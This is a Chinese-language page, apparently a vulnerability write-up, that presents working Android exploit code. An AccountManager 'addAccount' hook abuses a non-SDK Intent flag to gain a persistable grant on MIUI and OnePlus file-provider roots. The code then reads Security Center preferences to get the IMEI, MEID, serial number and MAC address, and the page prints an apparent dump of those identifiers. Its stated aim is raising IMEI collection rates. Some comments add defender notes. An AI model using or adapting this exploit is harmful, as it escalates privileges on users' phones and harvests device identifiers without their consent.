
【漏洞】IMEI采集率补偿

设备唯一ID

MIUI11 提权读取 IMEI（系统缓存漏洞）

/**
 * "Add account" hook that turns the AccountManager flow into a URI-permission grant.
 *
 * The Intent returned here is launched on the app's behalf by the account framework.
 * It targets the app's own SuccessActivity, carries the read/write/persistable/prefix
 * URI grant flags plus one non-SDK flag bit, and names a vendor file provider's root
 * as its data URI; where the vendor build honours that bit, the app ends up holding a
 * persistable grant on the whole provider root (the read snippet further down the page
 * uses exactly that grant).
 *
 * The enclosing class is outside this excerpt; presumably an AbstractAccountAuthenticator
 * subclass, since the signature matches its addAccount — confirm.
 *
 * Defender notes: the exposure is bounded by what the vendor provider exports, so a
 * provider that serves its root to arbitrary callers is the primary finding. As I recall,
 * recent AOSP validates the KEY_INTENT returned by authenticators and refuses the SDK
 * FLAG_GRANT_* bits — verify against the target release; the 0x80000000 bit is not a public
 * Intent flag, so a ROM treating it as a grant bit is what needs fixing. Detection-wise,
 * app-originated intents whose data URI is a *.fileProvider root are worth alerting on.
 *
 * @param response        AccountManager callback; not used by this body
 * @param accountType     ignored here
 * @param authTokenType   ignored here
 * @param requiredFeatures ignored here
 * @param options         ignored here
 * @return the bundle built by createEvilBundle (defined elsewhere in the file; presumably
 *         wraps the Intent under AccountManager.KEY_INTENT — confirm)
 * @throws NetworkErrorException declared by the overridden method; never thrown here
 */
@SuppressLint("WrongConstant") // needed because 0x80000000 below is not a recognised Intent flag
@Override
public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException {
Intent intent = new Intent();
// Explicit component: the grant lands on this app's own activity.
intent.setComponent(new ComponentName("com.xingin.pinduoduoexploit", "com.xingin.pinduoduoexploit.SuccessActivity"));
// Standard SDK grant bits; EXCLUDE_FROM_RECENTS keeps the launched activity out of the recents list.
intent.addFlags(Intent.FLAG_ACTIVITY_EXCLUDE_FROM_RECENTS | Intent.FLAG_GRANT_READ_URI_PERMISSION
| Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
// Prefix + persistable grants are gated on API 21, where FLAG_GRANT_PREFIX_URI_PERMISSION appeared;
// together they extend the grant to every URI under the root and keep it across reboots.
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
intent.addFlags(Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
}
// Non-SDK bit; the original calls it FLAG_GRANT_SYSTEM_APP_URI_PERMISSION — "the Xiaomi hole".
// Only meaningful on builds that interpret this bit; stock Android defines no flag here.
intent.addFlags(0x80000000);
// intent.setData(Uri.parse("content://com.xingin.xhs.provider/opensdk_root"));
// Data URI = the root of MIUI's securitycore file provider; the grant applies to this root.
intent.setData(Uri.parse("content://com.miui.securitycore.fileProvider/root_files"));
// evilIntent is a field defined elsewhere in the file; when set it replaces the Intent built above.
return createEvilBundle(evilIntent == null ? intent : evilIntent);
}

提权后直接读取

// Reads a file through the provider root granted in the addAccount flow above. The path is
// MIUI Security Center's stats preferences, which — per the dump that follows on this page —
// hold imei1/meid/serial/mac. getContentResolver() implies this runs inside a Context
// (Activity or Service); the enclosing method is not shown.
try (InputStream is = getContentResolver().openInputStream(Uri.parse("content://com.miui.securitycore.fileProvider/root_files/data/user/0/com.miui.securitycenter/shared_prefs/mi_stat_pref.xml"))){
// NOTE: available() is an estimate, not the file length, and a single read() may return
// fewer bytes than the buffer holds; the snippet assumes both hold for this small file
// and ignores read()'s return value.
byte[] bytes = new byte[is.available()];
is.read(bytes);
// Decoded with the platform charset (no explicit StandardCharsets) and written to logcat at
// ERROR level, so the device identifiers are visible to anything with log access (adb, READ_LOGS).
Log.e("s1nk", new String(bytes));
} catch (IOException e) {
// Open/read failure is logged with the cause; the grant itself is not re-checked here.
Log.e("s1nk", "open file failed: ", e);
}

包含信息如下

<string name="meid">99001084927914</string>
<long name="l_t" value="1713258063176" />
<string name="imei1">868030038557946</string>
<long name="netSpeedTotalRxBytes" value="301975" />
<float name="netSpeed" value="0.016664945" />
<string name="serial">c9c2fd2c</string>
<long name="s_t" value="1713258062704" />
<long name="e_t" value="26082" />
<boolean name="od_checked" value="true" />
<long name="net_speed_time_stamp" value="1713846738919" />
<string name="mac">9c:2e:a1:91:8c:e5</string>

一加后门

// OnePlus variant of the Intent built in the MIUI addAccount above; the enclosing method
// starts before this excerpt and its closing brace is not shown.
Intent intent = new Intent();
// Same explicit component: the grant lands on this app's own activity.
intent.setComponent(new ComponentName("com.xingin.pinduoduoexploit", "com.xingin.pinduoduoexploit.SuccessActivity"));
// Standard SDK grant bits, as in the MIUI version.
intent.addFlags(Intent.FLAG_ACTIVITY_EXCLUDE_FROM_RECENTS | Intent.FLAG_GRANT_READ_URI_PERMISSION
| Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
// Prefix + persistable grants gated on API 21, where FLAG_GRANT_PREFIX_URI_PERMISSION appeared.
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
intent.addFlags(Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
}
// intent.addFlags(0x80000000); // FLAG_GRANT_SYSTEM_APP_URI_PERMISSION — the Xiaomi hole
// intent.setData(Uri.parse("content://com.xingin.xhs.provider/opensdk_root"));
// Integer.MIN_VALUE is 0x80000000 — the same non-SDK bit as the MIUI version, spelled
// differently. "The OnePlus hole": only a build that interprets this bit gives it any effect.
intent.addFlags(Integer.MIN_VALUE);
// Data URI = the root of the OnePlus file manager's safefiles provider; the grant applies to this root.
// Defender note: a provider that exports its root path to arbitrary callers is the underlying finding.
intent.setData(Uri.parse("content://com.oneplus.filemanager.safefiles/root_path"));
// evilIntent and createEvilBundle are defined elsewhere in the file (see the MIUI version).
return createEvilBundle(evilIntent == null ? intent : evilIntent);